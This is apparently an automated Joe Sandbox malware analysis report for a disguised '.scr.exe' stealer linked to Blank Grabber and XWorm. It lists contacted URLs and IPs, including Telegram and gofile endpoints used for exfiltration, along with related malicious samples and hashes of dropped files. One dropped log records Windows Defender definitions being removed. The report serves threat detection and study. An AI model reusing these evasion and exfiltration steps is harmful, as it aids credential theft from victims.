00000002.00000003.2082475372.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2163456438.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2139193812.0000028C877D5000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://www.mozilla.oL#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2135317494.0000028C8873B000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123650876.0000028C8873A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2103806631.0000028C8873B000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://account.bellmedia.c#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2332092681.0000028C88A42000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88298000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://ocsp.sectigo#U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000002.2344600266.000001CCD86BE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2344137024.000001CCD86BE000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://crl.0#U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000002.2344600266.000001CCD86BE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2344137024.000001CCD86BE000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327784022.0000028C876A3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2325587092.0000028C876A3000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://login.microsoftonline.com#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C8828C000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2332092681.0000028C88A42000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://go.microspowershell.exe, 00000007.00000002.2286012485.000001619A462000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://cacerts.digicert.co#U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://crl.thawte.com/ThawteTimestampingCA.crl0#U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://html.spec.whatwg.org/multipage/#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87B77000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87B74000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2329026765.0000028C87B86000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2322690660.0000028C87B63000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154463139.0000028C87B74000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2083926352.0000028C87B75000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324666281.0000028C87B77000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2326023533.0000028C87B85000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2323296128.0000028C87B76000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://www.ifeng.com/#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330540975.0000028C87F90000.00000004.00001000.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://www.zhihu.com/#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88248000.00000004.00001000.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://contoso.com/powershell.exe, 00000029.00000002.2187351911.00000153101B8000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://oneget.orgXpowershell.exe, 00000029.00000002.2158201728.000001530176B000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png0#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmpfalse
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://api.gofile.io/getServer#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmpfalse
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.2265902518.0000016191CF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2187351911.0000015310075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2158201728.000001530196F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2187351911.00000153101B8000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000029.00000002.2158201728.000001530176B000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://sectigo.com/CPS0#U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.google.com/images/branding/product/ico/googleg_lodp.ico#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://www.amazon.co.uk/#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://ocsp.thawte.com0#U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://json.org#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2060431464.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              208.95.112.1
              ip-api.comUnited States
              53334TUT-ASUSfalse
              149.154.167.220
              api.telegram.orgUnited Kingdom
              62041TELEGRAMRUtrue
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1487425
              Start date and time:2024-08-04 02:21:09 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 12m 51s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:91
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:#U202f#U202f#U2005#U00a0.scr.exe
              renamed because original name is a hash value
              Original Sample Name:.scr.exe
              Detection:MAL
              Classification:mal100.rans.troj.spyw.expl.evad.winEXE@144/95@2/2
              EGA Information:
              • Successful, ratio: 60%
              HCA Information:
              • Successful, ratio: 86%
              • Number of executed functions: 110
              • Number of non-executed functions: 168
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 142.250.185.195
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, gstatic.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target powershell.exe, PID 2860 because it is empty
              • Execution Graph export aborted for target powershell.exe, PID 7908 because it is empty
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtCreateFile calls found.
              • Report size getting too big, too many NtCreateKey calls found.
              • Report size getting too big, too many NtEnumerateKey calls found.
              • Report size getting too big, too many NtOpenFile calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              TimeTypeDescription
              20:22:04API Interceptor155x Sleep call for process: powershell.exe modified
              20:22:04API Interceptor5x Sleep call for process: WMIC.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              208.95.112.1NaOH.exeGet hashmaliciousXWormBrowse
              • ip-api.com/line/?fields=hosting
              SSPInstallerV2.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
              • ip-api.com/json/?fields=225545
              XWorm.V5.6.exeGet hashmaliciousXWormBrowse
              • ip-api.com/line/?fields=hosting
              oc 1337.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
              • ip-api.com/line/?fields=hosting
              Xbox.exeGet hashmaliciousXWorm, XmrigBrowse
              • ip-api.com/line/?fields=hosting
              setup.exeGet hashmaliciousXWormBrowse
              • ip-api.com/line/?fields=hosting
              Base.exeGet hashmaliciousAsyncRAT, Blank Grabber, XWormBrowse
              • ip-api.com/json/?fields=225545
              WindowsStartUp.exeGet hashmaliciousXWormBrowse
              • ip-api.com/line/?fields=hosting
              aznuril.exeGet hashmaliciousXWormBrowse
              • ip-api.com/line/?fields=hosting
              setup.exeGet hashmaliciousXWormBrowse
              • ip-api.com/line/?fields=hosting
              149.154.167.220ShadowCrypter.exeGet hashmaliciousClipboard Hijacker, XWormBrowse
                GhostBinder-FUD.exeGet hashmaliciousXWormBrowse
                  msedge.exeGet hashmaliciousXWormBrowse
                    rPI209087.exeGet hashmaliciousAgentTeslaBrowse
                      SolaraModified.exeGet hashmaliciousXWormBrowse
                        aznuril.exeGet hashmaliciousXWormBrowse
                          setup.exeGet hashmaliciousXWormBrowse
                            -kredi Karti Hesap #U00d6zeti- 4508 0519.xls.exeGet hashmaliciousSnake KeyloggerBrowse
                              -kredi Karti Hesap #U00d6zeti- 4508 0519.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                hvmBCe45I1.exeGet hashmaliciousGo InjectorBrowse
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  ip-api.comNaOH.exeGet hashmaliciousXWormBrowse
                                  • 208.95.112.1
                                  SSPInstallerV2.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                                  • 208.95.112.1
                                  XWorm.V5.6.exeGet hashmaliciousXWormBrowse
                                  • 208.95.112.1
                                  oc 1337.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  Xbox.exeGet hashmaliciousXWorm, XmrigBrowse
                                  • 208.95.112.1
                                  setup.exeGet hashmaliciousXWormBrowse
                                  • 208.95.112.1
                                  Base.exeGet hashmaliciousAsyncRAT, Blank Grabber, XWormBrowse
                                  • 208.95.112.1
                                  WindowsStartUp.exeGet hashmaliciousXWormBrowse
                                  • 208.95.112.1
                                  aznuril.exeGet hashmaliciousXWormBrowse
                                  • 208.95.112.1
                                  setup.exeGet hashmaliciousXWormBrowse
                                  • 208.95.112.1
                                  api.telegram.orgShadowCrypter.exeGet hashmaliciousClipboard Hijacker, XWormBrowse
                                  • 149.154.167.220
                                  GhostBinder-FUD.exeGet hashmaliciousXWormBrowse
                                  • 149.154.167.220
                                  msedge.exeGet hashmaliciousXWormBrowse
                                  • 149.154.167.220
                                  rPI209087.exeGet hashmaliciousAgentTeslaBrowse
                                  • 149.154.167.220
                                  SolaraModified.exeGet hashmaliciousXWormBrowse
                                  • 149.154.167.220
                                  aznuril.exeGet hashmaliciousXWormBrowse
                                  • 149.154.167.220
                                  setup.exeGet hashmaliciousXWormBrowse
                                  • 149.154.167.220
                                  -kredi Karti Hesap #U00d6zeti- 4508 0519.xls.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 149.154.167.220
                                  -kredi Karti Hesap #U00d6zeti- 4508 0519.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 149.154.167.220
                                  hvmBCe45I1.exeGet hashmaliciousGo InjectorBrowse
                                  • 149.154.167.220
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  TELEGRAMRUhttps://loker-pt-freeport-indonesia-2024.digitall-co.web.id/Get hashmaliciousUnknownBrowse
                                  • 149.154.167.99
                                  ShadowCrypter.exeGet hashmaliciousClipboard Hijacker, XWormBrowse
                                  • 149.154.167.220
                                  GhostBinder-FUD.exeGet hashmaliciousXWormBrowse
                                  • 149.154.167.220
                                  msedge.exeGet hashmaliciousXWormBrowse
                                  • 149.154.167.220
                                  woklsbEMwW.exeGet hashmaliciousVidarBrowse
                                  • 149.154.167.99
                                  https://creativeservices.netflix.com.sg-vnt-2.sosis-berurat.live/Get hashmaliciousUnknownBrowse
                                  • 149.154.167.99
                                  https://creativeservices.netflix.com.sg-vnt-1.sosis-berurat.live/Get hashmaliciousUnknownBrowse
                                  • 149.154.167.99
                                  https://creativeservices.netflix.com.sg-vnt-3.sosis-berurat.live/Get hashmaliciousUnknownBrowse
                                  • 149.154.167.99
                                  rPI209087.exeGet hashmaliciousAgentTeslaBrowse
                                  • 149.154.167.220
                                  SolaraModified.exeGet hashmaliciousXWormBrowse
                                  • 149.154.167.220
                                  TUT-ASUSNaOH.exeGet hashmaliciousXWormBrowse
                                  • 208.95.112.1
                                  SSPInstallerV2.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                                  • 208.95.112.1
                                  XWorm.V5.6.exeGet hashmaliciousXWormBrowse
                                  • 208.95.112.1
                                  oc 1337.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  Xbox.exeGet hashmaliciousXWorm, XmrigBrowse
                                  • 208.95.112.1
                                  setup.exeGet hashmaliciousXWormBrowse
                                  • 208.95.112.1
                                  Base.exeGet hashmaliciousAsyncRAT, Blank Grabber, XWormBrowse
                                  • 208.95.112.1
                                  WindowsStartUp.exeGet hashmaliciousXWormBrowse
                                  • 208.95.112.1
                                  aznuril.exeGet hashmaliciousXWormBrowse
                                  • 208.95.112.1
                                  setup.exeGet hashmaliciousXWormBrowse
                                  • 208.95.112.1
                                  No context
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  C:\Users\user\AppData\Local\Temp\_MEI17882\VCRUNTIME140.dllShadowCrypter.exeGet hashmaliciousClipboard Hijacker, XWormBrowse
                                    GhostBinder-FUD.exeGet hashmaliciousXWormBrowse
                                      rQTI6IKszT.exeGet hashmaliciousUnknownBrowse
                                        LKEAHetlG6.exeGet hashmaliciousUnknownBrowse
                                          Base.exeGet hashmaliciousAsyncRAT, Blank Grabber, XWormBrowse
                                            Doc4.docx.docGet hashmaliciousUnknownBrowse
                                              1 (3).exeGet hashmaliciousUnknownBrowse
                                                Doc4.docx.docGet hashmaliciousUnknownBrowse
                                                  Windows.exeGet hashmaliciousPython StealerBrowse
                                                    V3NOM LOGGER 1.05.exeGet hashmaliciousXWormBrowse
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):0.34726597513537405
                                                      Encrypted:false
                                                      SSDEEP:3:Nlll:Nll
                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                      Malicious:false
                                                      Preview:@...e...........................................................
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):674400
                                                      Entropy (8bit):7.922476060998595
                                                      Encrypted:false
                                                      SSDEEP:12288:NDKZM3lTvUyWFppcFKYMR7VnWEDpUQIZQtVy+bCSFGRip1APIKJTJ:N/1ZWFpprBRbZbCSFGREKRJ
                                                      MD5:3A3B63134C9D9CD2E2EB0B8BD859B2D6
                                                      SHA1:FFBC89AF0E9A9F2ECF1391E05065CBEA20F463BA
                                                      SHA-256:46AE8C35FA9240A5CAC298C19AAD7DB7EB289BBBA174F300F9CEE032D0AC2825
                                                      SHA-512:75B01A2C24CDF8BAACDED657FEF6907CF1601C18F78CC542C403FCB0B68FB9264465E934F1B572118B0A08A0AD6AD0550B00FB8A208F63A4780C4BF09F63911F
                                                      Malicious:false
                                                      Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.....G...fVm..uf.L.3..3M......gz.{..h.zh@.{/$...{o......"...........B.!.....q.....2..*k.-Q{.gE..}..U[.H....;.c.I...<9..;&....g...H.G/....wXb.t.6w:_....'.Q|.2U...k.,...g.~.....c..M..;../,....].S...~....g.^.t.|hNL}Z<2.....!L.>...zh$S...~..v.I....sb.......L-....[.S..wq..=....w..TE..w-....l...]i..w...;.2.^....{..`...L...y....[.~>'..>?.o.i(..So.Y......7...}..Z..8.eo..+.So.q(...z.......z..}.[....u...k..z];.Z.z.z.Ogx.-..t..w.._.:..:-..O......+.)L...2..j8.T..by...9.{.U...AW..|~.O..L...=......g5.V../......W..U..6.80.q..i.......;xn..W....H._.k...../....}.K...^..9../..-...3....*...rb..q.uy...c=.........XC....-.;...zz..cm...%ml.~W....s..k.W..........2N......v.(uw...5..;.V.;.^P...l......H.......?.../...-.-..K>s.....\.....9..|j....;_....3.0..E.....N......pA....2_.s...b...k.c..w....t.{.W...s;..y.z...n....v.s...q.@n...w.c^...Y.......9%.Z}..EN.
                                                      Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):894
                                                      Entropy (8bit):3.106809372209216
                                                      Encrypted:false
                                                      SSDEEP:12:Q58KRBubdpkoPAGdjrZ4ZuZk9+MlWlLehW51IC44ZOI:QOaqdmOFdjrSA++kWResLIagI
                                                      MD5:F3590D52698AEB56FD49320BD25F81C4
                                                      SHA1:2D95D225C2EA0F491A3D5D402F6929BF018B0468
                                                      SHA-256:58FD51788E100425F4ACDF07AA8796CC226ED0022A30753C36C4A532BD283204
                                                      SHA-512:099FE7E6C2B97A4B592650DA4702B9A2BE2D112E06AD11B985C80F8B253CFA8A45BC21FF700D5D07AD00AD1A65B1C4DF2C63C6CBCB51F607CECB53BBFBDEF863
                                                      Malicious:false
                                                      Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. S.a.t. .. A.u.g. .. 0.3. .. 2.0.2.4. .2.0.:.2.2.:.2.5.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. S.a.t. .. A.u.g. .. 0.3. .. 2.0.2.4. .2.0.:.2.2.:.2.5.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....
                                                      Process:C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe
                                                      File Type:RAR archive data, v5
                                                      Category:dropped
                                                      Size (bytes):691454
                                                      Entropy (8bit):7.999715655207366
                                                      Encrypted:true
                                                      SSDEEP:12288:V6csZheMJP68MEJhii/BpF9GRvsnEgc1vgi80kft9UPTcX6FrjvwGivQ86jXHa:V2/JhiwbevwEpI3A9lbavUX6
                                                      MD5:5BFA75FEF9B8CACB8175EEB0B4A9B5D3
                                                      SHA1:046265ADD4F3CC8EDD64F3BD96182BEDE2CAFBC5
                                                      SHA-256:7700B58A64E8B825E61EC754D677D3AF7A0AAC72F6C84A7555D83CC14A3899F0
                                                      SHA-512:6BD21868AF5D780A2FCABA12573073FC68C425F82140FEBCD0B013E8A7DAE6DC224339654D9F1EF4EA2F79B6FED43398831A4AE92127053BB0FAB28A9966B0A2
                                                      Malicious:true
                                                      Preview:Rar!....x.6!..............8F...6.f?.{ru..].Y%.(..%...^.............<DT._Cn.k.....eJ..?.GbV./.d;..;_..)...|..2nM.~.........%.)m.\.B.@..4P....q4....... Uz. .n...v.~|.Z.I.Qx<z<!N.]!.c../.....ws.Ce....9..;%.CNW.s.bD...3S..g.......].e...8.3!..A.K....DfeJ....9v>">........KI..H.k.....\.7`{'...Ou.\..E..?.#R.x.s&.)...Xh........l.-.+N=...b..F...o4.&X58.O..]..[....9/.}..d....dw.....^.ay..ZE_Z+..i...G..'".....d._.....}h...!.VVl...Q...&.B...n8..8.+;>....1.U!v}\..Q......(.J7g.F;..B.....\|..D2.]...d.H.+....1}(.:..VK~...>...j...r.;...H5s-."..0k]x.....^#.a.n...5:...Z....#..B..&...L...m...&..AKC.`bh(V......2.............z.)SK)m......&RW>M.$..Yc0....n{>.Fn...{`.Lh...F:.w..h.L..........F....^Pc..I..O.B.A.[.<7....T..".o.Wc...HL.=..z...5..9.Y.x.N.mxf.......1m...'p:....*..M..[&^%...>.i#..x&[..>.G..o..[.<A......3A..=E.9...nm....g../....L.Sg..y.$.....!\...e`...p.Q..t.(..'{Z...&.ND...~H.}Z.9....Q..../u.G.........Il..G....~i.A..r2y.~..&".@s".`M....\...U...
                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Sun Aug 4 02:13:43 2024, 1st section name ".debug$S"
                                                      Category:dropped
                                                      Size (bytes):1372
                                                      Entropy (8bit):4.126657831616209
                                                      Encrypted:false
                                                      SSDEEP:24:HSq9U7bMKHdwKaZXNeI+ycuZhNYHakS5QPNnqS+d:c7neKaVw1ul2a3CqSe
                                                      MD5:C0D80E40E8E04F02A6363FE554905BE1
                                                      SHA1:1A2C9DC5EFE662CED73284E9D56EB0C2E7F48034
                                                      SHA-256:ED724445A45552BECA8E50B52BD5FF949C1CCECDF42B1EE85CD82783F5E23F5E
                                                      SHA-512:5373020FEA46A0D42BE18ABBDA04B64E584C0124389FF6E441D787492125BF70BD51DA9E98B52D302CEEEFD53D9F8DC344FADE4B067102366008CB4EFEC3243D
                                                      Malicious:false
                                                      Preview:L.....f.............debug$S........x...................@..B.rsrc$01........X.......\...........@..@.rsrc$02........P...f...............@..@........S....c:\Users\user\AppData\Local\Temp\xuxqeuoy\CSC1B8650382DAF4CDABC63EC72E90C84.TMP................SM.r...I!6.3.}..........5.......C:\Users\user\AppData\Local\Temp\RES6756.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.u.x.q.e.u.o.y...d.l.l.....(.....L.e.g.a.
                                                      Process:C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):119192
                                                      Entropy (8bit):6.6016214745004635
                                                      Encrypted:false
                                                      SSDEEP:1536:+qvQ1Dj2DkX7OcujarvmdlYNABCmgrP4ddbkZIecbWcFML/UXzlghzdMFw84hzk:+qvQ1D2CreiABCmgYecbWVLUD6h+b4ho
                                                      MD5:BE8DBE2DC77EBE7F88F910C61AEC691A
                                                      SHA1:A19F08BB2B1C1DE5BB61DAF9F2304531321E0E40
                                                      SHA-256:4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
                                                      SHA-512:0DA644472B374F1DA449A06623983D0477405B5229E386ACCADB154B43B8B083EE89F07C3F04D2C0C7501EAD99AD95AECAA5873FF34C5EEB833285B598D5A655
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                      Joe Sandbox View:
                                                      • Filename: ShadowCrypter.exe, Detection: malicious, Browse
                                                      • Filename: GhostBinder-FUD.exe, Detection: malicious, Browse
                                                      • Filename: rQTI6IKszT.exe, Detection: malicious, Browse
                                                      • Filename: LKEAHetlG6.exe, Detection: malicious, Browse
                                                      • Filename: Base.exe, Detection: malicious, Browse
                                                      • Filename: Doc4.docx.doc, Detection: malicious, Browse
                                                      • Filename: 1 (3).exe, Detection: malicious, Browse
                                                      • Filename: Doc4.docx.doc, Detection: malicious, Browse
                                                      • Filename: Windows.exe, Detection: malicious, Browse
                                                      • Filename: V3NOM LOGGER 1.05.exe, Detection: malicious, Browse
